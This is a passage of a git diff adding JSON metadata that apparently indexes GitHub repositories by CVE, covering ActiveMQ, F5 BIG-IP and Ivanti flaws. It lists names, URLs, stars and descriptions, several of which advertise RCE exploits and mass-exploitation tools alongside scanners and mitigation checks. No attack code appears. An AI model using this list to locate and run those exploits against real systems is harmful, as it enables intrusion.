"public" + }, + "html_url": "https:\/\/github.com\/nitzanoligo\/CVE-2023-46604-demo", + "description": null, + "fork": false, + "created_at": "2023-11-20T11:57:24Z", + "updated_at": "2024-11-05T13:10:04Z", + "pushed_at": "2024-11-05T13:10:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725243332, + "name": "activemq-cve-2023-46604", + "full_name": "tomasmussi-mulesoft\/activemq-cve-2023-46604", + "owner": { + "login": "tomasmussi-mulesoft", + "id": 87021051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87021051?v=4", + "html_url": "https:\/\/github.com\/tomasmussi-mulesoft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tomasmussi-mulesoft\/activemq-cve-2023-46604", + "description": "Repository to exploit CVE-2023-46604 reported for ActiveMQ", + "fork": false, + "created_at": "2023-11-29T18:30:02Z", + "updated_at": "2024-11-02T13:29:09Z", + "pushed_at": "2024-11-02T13:29:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 728564712, + "name": "CVE-Lab", + "full_name": "dcm2406\/CVE-Lab", + "owner": { + "login": "dcm2406", + "id": 106772368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106772368?v=4", + "html_url": "https:\/\/github.com\/dcm2406", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dcm2406\/CVE-Lab", + "description": "Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604", + "fork": false, + "created_at": "2023-12-07T08:02:53Z", + "updated_at": "2024-03-21T06:45:44Z", + "pushed_at": "2024-03-20T06:20:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729610758, + "name": "CVE-2023-46604", + "full_name": "mrpentst\/CVE-2023-46604", + "owner": { + "login": "mrpentst", + "id": 85231870, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85231870?v=4", + "html_url": "https:\/\/github.com\/mrpentst", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrpentst\/CVE-2023-46604", + "description": "Exploit for CVE-2023-46604", + "fork": false, + "created_at": "2023-12-09T19:19:03Z", + "updated_at": "2023-12-09T19:32:34Z", + "pushed_at": "2024-02-24T16:15:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 732382912, + "name": "CVE-2023-46604", + "full_name": "dcm2406\/CVE-2023-46604", + "owner": { + "login": "dcm2406", + "id": 106772368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106772368?v=4", + "html_url": "https:\/\/github.com\/dcm2406", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dcm2406\/CVE-2023-46604", + "description": null, + "fork": false, + "created_at": "2023-12-16T13:50:58Z", + "updated_at": "2023-12-16T13:54:55Z", + "pushed_at": "2023-12-21T12:00:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734983177, + "name": "Broker_ApacheMQ", + "full_name": "Mudoleto\/Broker_ApacheMQ", + "owner": { + "login": "Mudoleto", + "id": 106175454, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106175454?v=4", + "html_url": "https:\/\/github.com\/Mudoleto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mudoleto\/Broker_ApacheMQ", + "description": "CVE-2023-46604 - ApacheMQ Version 5.15.5 Vulnerability Machine: Broker", + "fork": false, + "created_at": "2023-12-23T08:41:01Z", + "updated_at": "2023-12-26T05:21:10Z", + "pushed_at": "2023-12-26T05:21:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 740774996, + "name": "cve-2023-46604", + "full_name": "hh-hunter\/cve-2023-46604", + "owner": { + "login": "hh-hunter", + "id": 91593280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4", + "html_url": "https:\/\/github.com\/hh-hunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hh-hunter\/cve-2023-46604", + "description": null, + "fork": false, + "created_at": "2024-01-09T03:18:19Z", + "updated_at": "2024-01-09T03:18:19Z", + "pushed_at": "2024-01-09T03:18:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 757561414, + "name": "ExploitScript-CVE-2023-46604", + "full_name": "stegano5\/ExploitScript-CVE-2023-46604", + "owner": { + "login": "stegano5", + "id": 67293586, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67293586?v=4", + "html_url": "https:\/\/github.com\/stegano5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stegano5\/ExploitScript-CVE-2023-46604", + "description": null, + "fork": false, + "created_at": "2024-02-14T18:39:49Z", + "updated_at": "2024-02-14T19:20:54Z", + "pushed_at": "2024-02-14T19:19:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 767370814, + "name": "ActiveMQ-RCE-Exploit", + "full_name": "Arlenhiack\/ActiveMQ-RCE-Exploit", + "owner": { + "login": "Arlenhiack", + "id": 162281579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162281579?v=4", + "html_url": "https:\/\/github.com\/Arlenhiack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arlenhiack\/ActiveMQ-RCE-Exploit", + "description": "ActiveMQ RCE (CVE-2023-46604) 回显利用工具", + "fork": false, + "created_at": "2024-03-05T07:09:21Z", + "updated_at": "2024-11-01T02:03:26Z", + "pushed_at": "2024-09-13T05:35:25Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787933435, + "name": "cve-2023-46604", + "full_name": "vulncheck-oss\/cve-2023-46604", + "owner": { + "login": "vulncheck-oss", + "id": 134310220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4", + "html_url": "https:\/\/github.com\/vulncheck-oss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-46604", + "description": "A go-exploit for Apache ActiveMQ CVE-2023-46604", + "fork": false, + "created_at": "2024-04-17T13:10:34Z", + "updated_at": "2024-10-30T15:47:10Z", + "pushed_at": "2024-11-22T16:50:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-46604", + "go-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792301008, + "name": "activemq-rce-cve-2023-46604", + "full_name": "thinkycx\/activemq-rce-cve-2023-46604", + "owner": { + "login": "thinkycx", + "id": 13138128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13138128?v=4", + "html_url": "https:\/\/github.com\/thinkycx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thinkycx\/activemq-rce-cve-2023-46604", + "description": "activemq-rce-cve-2023-46604", + "fork": false, + "created_at": "2024-04-26T11:42:57Z", + "updated_at": "2024-04-26T11:45:33Z", + "pushed_at": "2024-04-26T11:45:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807674683, + "name": "honeypot.rs", + "full_name": "mranv\/honeypot.rs", + "owner": { + "login": "mranv", + "id": 61981861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61981861?v=4", + "html_url": "https:\/\/github.com\/mranv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mranv\/honeypot.rs", + "description": " CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise.", + "fork": false, + "created_at": "2024-05-29T14:56:41Z", + "updated_at": "2024-05-29T18:18:22Z", + "pushed_at": "2024-07-22T18:11:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808380814, + "name": "CVE-2023-46604", + "full_name": "pulentoski\/CVE-2023-46604", + "owner": { + "login": "pulentoski", + "id": 60004847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60004847?v=4", + "html_url": "https:\/\/github.com\/pulentoski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pulentoski\/CVE-2023-46604", + "description": "El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) ", + "fork": false, + "created_at": "2024-05-31T00:38:47Z", + "updated_at": "2024-05-31T02:30:52Z", + "pushed_at": "2024-05-31T02:29:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 873364628, + "name": "CVE-2023-46604", + "full_name": "cuanh2333\/CVE-2023-46604", + "owner": { + "login": "cuanh2333", + "id": 152946968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152946968?v=4", + "html_url": "https:\/\/github.com\/cuanh2333", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cuanh2333\/CVE-2023-46604", + "description": null, + "fork": false, + "created_at": "2024-10-16T03:31:13Z", + "updated_at": "2024-10-22T18:16:58Z", + "pushed_at": "2024-10-22T18:16:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46615.json b/2023/CVE-2023-46615.json new file mode 100644 index 0000000000..422ea94836 --- /dev/null +++ b/2023/CVE-2023-46615.json @@ -0,0 +1,33 @@ +[ + { + "id": 725628979, + "name": "CVE-2023-46615", + "full_name": "RandomRobbieBF\/CVE-2023-46615", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-46615", + "description": "KD Coming Soon <= 1.7 - Unauthenticated PHP Object Injection via cetitle", + "fork": false, + "created_at": "2023-11-30T14:46:21Z", + "updated_at": "2024-07-11T16:40:03Z", + "pushed_at": "2023-11-30T14:51:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46694.json b/2023/CVE-2023-46694.json new file mode 100644 index 0000000000..84d507c0f9 --- /dev/null +++ b/2023/CVE-2023-46694.json @@ -0,0 +1,33 @@ +[ + { + "id": 765655083, + "name": "CVE-2023-46694", + "full_name": "invisiblebyte\/CVE-2023-46694", + "owner": { + "login": "invisiblebyte", + "id": 42798162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42798162?v=4", + "html_url": "https:\/\/github.com\/invisiblebyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/invisiblebyte\/CVE-2023-46694", + "description": "CVE-2023-46694 proof-of-concept", + "fork": false, + "created_at": "2024-03-01T11:00:19Z", + "updated_at": "2024-05-27T13:02:53Z", + "pushed_at": "2024-03-01T11:02:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46747.json b/2023/CVE-2023-46747.json new file mode 100644 index 0000000000..3be8f5a5e6 --- /dev/null +++ b/2023/CVE-2023-46747.json @@ -0,0 +1,287 @@ +[ + { + "id": 712777457, + "name": "CVE-2023-46747-Mass-RCE", + "full_name": "bijaysenihang\/CVE-2023-46747-Mass-RCE", + "owner": { + "login": "bijaysenihang", + "id": 89993432, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89993432?v=4", + "html_url": "https:\/\/github.com\/bijaysenihang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bijaysenihang\/CVE-2023-46747-Mass-RCE", + "description": "CVE-2023-46747 (F5 BIG-IP) RCE", + "fork": false, + "created_at": "2023-11-01T07:05:18Z", + "updated_at": "2023-11-02T00:30:14Z", + "pushed_at": "2023-10-30T14:01:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 712827804, + "name": "CVE-2023-46747-RCE", + "full_name": "W01fh4cker\/CVE-2023-46747-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-46747-RCE", + "description": "exploit for f5-big-ip RCE cve-2023-46747", + "fork": false, + "created_at": "2023-11-01T09:31:05Z", + "updated_at": "2024-11-27T17:13:05Z", + "pushed_at": "2024-10-20T10:27:37Z", + "stargazers_count": 203, + "watchers_count": 203, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2023-46747", + "exploit", + "f5", + "redteam" + ], + "visibility": "public", + "forks": 45, + "watchers": 203, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 712913642, + "name": "CVE-2023-46747", + "full_name": "fu2x2000\/CVE-2023-46747", + "owner": { + "login": "fu2x2000", + "id": 34998869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34998869?v=4", + "html_url": "https:\/\/github.com\/fu2x2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fu2x2000\/CVE-2023-46747", + "description": "CVE-2023-46747 Criticle Auth Bypass", + "fork": false, + "created_at": "2023-11-01T13:16:13Z", + "updated_at": "2023-11-01T13:17:31Z", + "pushed_at": "2023-11-01T13:17:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 712959399, + "name": "Mitigate-CVE-2023-46747", + "full_name": "maniak-academy\/Mitigate-CVE-2023-46747", + "owner": { + "login": "maniak-academy", + "id": 80640505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80640505?v=4", + "html_url": "https:\/\/github.com\/maniak-academy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maniak-academy\/Mitigate-CVE-2023-46747", + "description": null, + "fork": false, + "created_at": "2023-11-01T14:57:20Z", + "updated_at": "2023-11-04T15:33:52Z", + "pushed_at": "2023-11-05T17:10:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 713000566, + "name": "CVE-2023-46747-POC", + "full_name": "y4v4z\/CVE-2023-46747-POC", + "owner": { + "login": "y4v4z", + "id": 149609226, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149609226?v=4", + "html_url": "https:\/\/github.com\/y4v4z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/y4v4z\/CVE-2023-46747-POC", + "description": null, + "fork": false, + "created_at": "2023-11-01T16:28:28Z", + "updated_at": "2023-11-01T16:28:29Z", + "pushed_at": "2023-11-01T16:30:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713485222, + "name": "test_cve-2023-46747", + "full_name": "nvansluis\/test_cve-2023-46747", + "owner": { + "login": "nvansluis", + "id": 42541546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42541546?v=4", + "html_url": "https:\/\/github.com\/nvansluis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nvansluis\/test_cve-2023-46747", + "description": null, + "fork": false, + "created_at": "2023-11-02T16:03:35Z", + "updated_at": "2024-04-30T00:33:25Z", + "pushed_at": "2023-11-02T16:10:16Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713900805, + "name": "CVE-2023-46747", + "full_name": "RevoltSecurities\/CVE-2023-46747", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-46747", + "description": "An Exploitation script developed to exploit the CVE-2023-46747 which Pre Auth Remote Code Execution of f5-BIG Ip producs", + "fork": false, + "created_at": "2023-11-03T13:31:11Z", + "updated_at": "2024-04-24T17:45:07Z", + "pushed_at": "2023-11-03T14:37:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 755942386, + "name": "cve-2023-46747", + "full_name": "vidura2\/cve-2023-46747", + "owner": { + "login": "vidura2", + "id": 71623511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71623511?v=4", + "html_url": "https:\/\/github.com\/vidura2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vidura2\/cve-2023-46747", + "description": null, + "fork": false, + "created_at": "2024-02-11T14:38:37Z", + "updated_at": "2024-10-13T04:50:37Z", + "pushed_at": "2024-02-11T14:40:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 772788309, + "name": "CVE-2023-46747-RCE", + "full_name": "rainbowhatrkn\/CVE-2023-46747-RCE", + "owner": { + "login": "rainbowhatrkn", + "id": 147452376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147452376?v=4", + "html_url": "https:\/\/github.com\/rainbowhatrkn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rainbowhatrkn\/CVE-2023-46747-RCE", + "description": "exploit for f5-big-ip RCE cve-2023-46747", + "fork": false, + "created_at": "2024-03-15T22:45:31Z", + "updated_at": "2024-03-15T22:45:32Z", + "pushed_at": "2024-03-15T22:45:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46805.json b/2023/CVE-2023-46805.json new file mode 100644 index 0000000000..db284ca260 --- /dev/null +++ b/2023/CVE-2023-46805.json @@ -0,0 +1,259 @@ +[ + { + "id": 743237104, + "name": "CVE-2023-46805", + "full_name": "yoryio\/CVE-2023-46805", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2023-46805", + "description": "Scanner for CVE-2023-46805 - Ivanti Connect Secure", + "fork": false, + "created_at": "2024-01-14T18:30:11Z", + "updated_at": "2024-08-12T20:33:09Z", + "pushed_at": "2024-07-23T16:01:11Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-46805", + "cve-2024-21887", + "ivanti-connect-secure" + ], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 743894339, + "name": "CVE-2023-46805", + "full_name": "cbeek-r7\/CVE-2023-46805", + "owner": { + "login": "cbeek-r7", + "id": 117099647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117099647?v=4", + "html_url": "https:\/\/github.com\/cbeek-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbeek-r7\/CVE-2023-46805", + "description": "Simple scanner for scanning a list of ip-addresses for vulnerable Ivanti Pulse Secure devices", + "fork": false, + "created_at": "2024-01-16T08:05:58Z", + "updated_at": "2024-04-12T10:31:35Z", + "pushed_at": "2024-01-19T09:02:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744186376, + "name": "CVE-2023-46805_CVE-2024-21887", + "full_name": "duy-31\/CVE-2023-46805_CVE-2024-21887", + "owner": { + "login": "duy-31", + "id": 20819326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4", + "html_url": "https:\/\/github.com\/duy-31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-46805_CVE-2024-21887", + "description": "An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.", + "fork": false, + "created_at": "2024-01-16T19:40:59Z", + "updated_at": "2024-10-31T11:53:58Z", + "pushed_at": "2024-01-17T19:14:09Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 745015590, + "name": "CVE-2023-46805_CVE-2024-21887", + "full_name": "raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887", + "owner": { + "login": "raminkarimkhani1996", + "id": 26582031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26582031?v=4", + "html_url": "https:\/\/github.com\/raminkarimkhani1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887", + "description": "The script in this repository only checks whether the vulnerabilities specified in the Ivanti Connect Secure product exist.", + "fork": false, + "created_at": "2024-01-18T13:25:46Z", + "updated_at": "2024-04-30T02:04:11Z", + "pushed_at": "2024-03-23T14:52:22Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745284788, + "name": "Ivanti-Connect-Around-Scan", + "full_name": "seajaysec\/Ivanti-Connect-Around-Scan", + "owner": { + "login": "seajaysec", + "id": 7016191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7016191?v=4", + "html_url": "https:\/\/github.com\/seajaysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seajaysec\/Ivanti-Connect-Around-Scan", + "description": "Mitigation validation utility for the Ivanti Connect Around attack chain. Runs multiple checks. CVE-2023-46805, CVE-2024-21887.", + "fork": false, + "created_at": "2024-01-19T02:12:11Z", + "updated_at": "2024-04-05T07:44:30Z", + "pushed_at": "2024-02-03T01:59:49Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745287513, + "name": "CVE-2023-46805", + "full_name": "Chocapikk\/CVE-2023-46805", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-46805", + "description": "Ivanti Pulse Secure CVE-2023-46805 Scanner - Based on Assetnote's Research", + "fork": false, + "created_at": "2024-01-19T02:23:13Z", + "updated_at": "2024-07-09T21:51:46Z", + "pushed_at": "2024-01-19T03:17:13Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 745384269, + "name": "CVE-2023-46805_CVE-2024-21887_scan_grouped", + "full_name": "mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped", + "owner": { + "login": "mickdec", + "id": 33021266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33021266?v=4", + "html_url": "https:\/\/github.com\/mickdec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped", + "description": null, + "fork": false, + "created_at": "2024-01-19T08:11:31Z", + "updated_at": "2024-05-21T12:56:29Z", + "pushed_at": "2024-05-21T12:56:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748232137, + "name": "CVE-2023-46805", + "full_name": "w2xim3\/CVE-2023-46805", + "owner": { + "login": "w2xim3", + "id": 91914344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91914344?v=4", + "html_url": "https:\/\/github.com\/w2xim3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w2xim3\/CVE-2023-46805", + "description": "CVE-2023-46805 Ivanti POC RCE - Ultra fast scanner.", + "fork": false, + "created_at": "2024-01-25T14:53:16Z", + "updated_at": "2024-01-31T02:24:37Z", + "pushed_at": "2024-01-25T18:04:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-46805", + "ivanti", + "rce", + "scanner" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46813.json b/2023/CVE-2023-46813.json new file mode 100644 index 0000000000..64fd9bf29f --- /dev/null +++ b/2023/CVE-2023-46813.json @@ -0,0 +1,33 @@ +[ + { + "id": 